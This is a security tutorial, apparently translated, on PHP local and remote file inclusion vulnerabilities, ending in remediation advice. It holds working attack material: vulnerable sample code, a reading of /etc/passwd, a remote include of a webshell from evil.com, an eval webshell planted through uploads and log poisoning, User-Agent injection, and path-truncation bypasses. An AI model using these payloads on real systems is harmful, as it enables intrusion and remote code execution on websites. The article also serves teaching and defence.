introduce

File inclusion vulnerabilities are code injection vulnerabilities. In order to reduce repetitive code writing, the file inclusion function is introduced, and the file is included through the file inclusion function, and the code of the included file is directly used; simply speaking, a file contains another one or more document.

But in addition to including regular code files, any suffix files included will be executed as code. Therefore, if there is a point that allows users to control the path of included files, it is very likely to include unexpected files, thereby executing unexpected The code leads to getshell.

Almost all scripting languages provide the function of file inclusion, but most of the file inclusion vulnerabilities are in PHP Web Application, and there are very few or even none in JSP and ASP. The problem lies in the disadvantages of language design. Therefore, the follow-up is mainly based on PHP.

File contains vulnerability classification

File inclusion in PHP is divided into local file inclusion and remote file inclusion .

LFI

Local files include Local File Include (LFI)

The contents of the included files comply with the PHP grammar specification, and any extension can be parsed by PHP.

The content of the included file does not conform to the PHP syntax specification, and its source code will be exposed (equivalent to reading the file).

RFI

Remote file includes Remote File Include (RFI)

If you want to use the remote include function, you first need to determine whether the remote include function option has been enabled in PHP (php disables the remote include function by default: allow_url_include=off). To enable the remote include function, you need to modify it in the php.ini configuration file.

There is no difference between remote inclusion and local inclusion, except that it supports remote loading and is easier to getshell. No matter what kind of extension it is, as long as it follows the PHP syntax specification, the PHP parser will parse it.

PHP files contain functions

PHP provides four functions included in the file, namely include (), include_once (), require () and require_once (). These four functions can all be used for file inclusion, but their functions are not the same.

include: When the included file cannot be found, only a warning will be generated, and the script will continue to execute.
include_once: Similar to the include() statement, the only difference is that if the code in the file has already been included, it will not be included again.
require: Generates a fatal error and stops the script if the included file cannot be found.
require_once: Similar to the require() statement, the only difference is that if the code in the file has already been included, it will not be included again.

Vulnerability sample code

****<?php****// index.php$file = $_GET[ 'file' ];****include****$file****?>****

Quickly start a simple web server that parses php

php -S 127.0.0.1:9999

test:

http://127.0.0.1:9999/index.php?file=/etc/passwd

[1] Acquisition of all resources <1] 1. Network security learning route 2. E-books (white hat) 3. Internal video of security giants 4. 100 src documents 5. Common security interview questions 6. Analysis of classic questions in ctf competition 7 , a full set of tool kits 8, emergency response notes

read from any file

If the content does not conform to the php syntax, it will directly return the file content, which is equivalent to reading any file, which is the same as reading/downloading any file, so I won’t go into details

Using the PHP Wrapper Protocol

PHP comes with many built-in URL-style wrappers

`php://filter`

Under normal circumstances, the code contained in the php file will be directly executed, but if we want to get the source code of the php file, such as config.php, then we can read it through the encapsulation php://filterprotocol

http://127.0.0.1:9999/index.php?file=php://filter/read=convert.base64-encode/resource=shell.png

`php://input`

**Conditions for use: **Need to enable allow_url_include=on, no requirement for allow_url_fopen

RFI getshell

If it supports remote file inclusion, http://127.0.0.1:9999/index.php?file=http://evil.com/shell.phpyou can directly getshell, because there are too few cases, so I won’t say more.

LFI+ file upload getshell

This is one of the easiest ways to think of a local file containment exploit to getshell.

There is an LFI vulnerability on the website, and there are upload functions, such as uploading avatars, certification information, etc., then we can upload a file with any suffix containing malicious code, such as .png

The content of .png contains

<?php @eval($_GET['shell']);?>

Use as follows:

http://127.0.0.1:9999/index.php?file=shell.png&shell=phpinfo();

[!tip]

There may be too many interference factors in the uploaded file, resulting in a messy display interface, then we can write a webshell to other files separately through functions such as file_put_contents().

LFI+ log file getshell

Log files often contain our request records. If we know the location of the log file, we can write malicious php code into the log, and then execute the relevant code through the file containing the vulnerability.

Example:

URL access

http://127.0.0.1:9999/index.php?file=shell.png&test=<?php @eval($_GET['shell']);?>

The payload will be recorded in the log file, and the log file is as follows

We only need to include this log file, then we can getshell

Log default path:

There may be some discrepancies, everything is subject to the actual situation

LFI+/proc/self/environgetshell

In linux, if php runs in cgi mode, then /proc/self/environ will contain the UA information in the request header, so you can getshell

GET lfi.php?file=../../../../../../proc/self/environ HTTP/1.1User-Agent: <?php phpinfo();?>

LFI+phpinfo getshell

In addition to requiring an LFI vulnerability to exist, a phpinfo() page also needs to exist

Principle: Upload a file to the phpinfo() page POST, and PHP will save the file as a temporary file, the path is usually: /tmp/php[6 random characters], this temporary file will be deleted after the request ends . It is somewhat similar to the operation of conditional competition.

When using it, it is necessary to modify the parameters in the tool and the target parameters to adapt

LFI+session getshell

It's very tasteless, it requires you to be able to control the session. Generally, we can first look at which parts of the session are controllable

The save path of php session file can be seen in session.save_path of phpinfo.

Common php-session storage locations:

/var/lib/php/sess_PHPSESSID
/var/lib/php/sessions
/tmp/sess_PHPSESSID
/tmp/sessions/sess_PHPSESSI

If you can control the content of the session, it is equivalent to controlling the content of the file /var/lib/php/sessions. Combined with the previous operations, you can directly getshell

Bypass the specified prefix

Vulnerability code:

<?php$file = $_GET['file'];include'/var/www/html/'.$file;?>

Bypass method:

Jump to other directories through the ../backtracking character, such as../../../proc/self/environ

Or through the backtracking character ../, mainly to encode the content

URL encoding

2 URL encodings

Encodings supported by the container/server, ..%c0%af == ../, ..%c1%9c == ..\

specify suffix

Vulnerability code:

<?php$file = $_GET['file'];include****$file.'/test/test.php';?>

Bypass method:

If RFI is supported, you can use ? and # to bypass it. ? means parameters, and # means anchor points, which will not affect the actual URL

Use the pseudo-protocols zip:// and phar://, take zip as an example, first create a compressed package, the compressed directory is test/test/test.php, and then use zip://xxx.zip#testas

In the case of php < 5.2.8, you can use length truncation, just repeat ./, the maximum value will be reached at 4096 bytes under linux, and 256 bytes under window. After reaching the maximum value, the following will be omitted. For example shell.php/./././././省略/./././; be careful not to exceed the maximum length supported by the container, otherwise it will prompt that the GET request is too long.

In the case of php < 5.3.4 magic_quotes_gpc=off, there is a 00 truncation, which is similar to the 00 truncation in the upload, making the backend mistakenly think that this is the end character

repair suggestion

Filter special characters such as .(dot)/(backslash)\(backslash)

Try to close allow_url_includethe configuration

Use open_basedir configuration in PHP to restrict access to specified areas

Set a file whitelist for files that need to be included

[Network Security] The file contains a summary of vulnerabilities

Table of contents: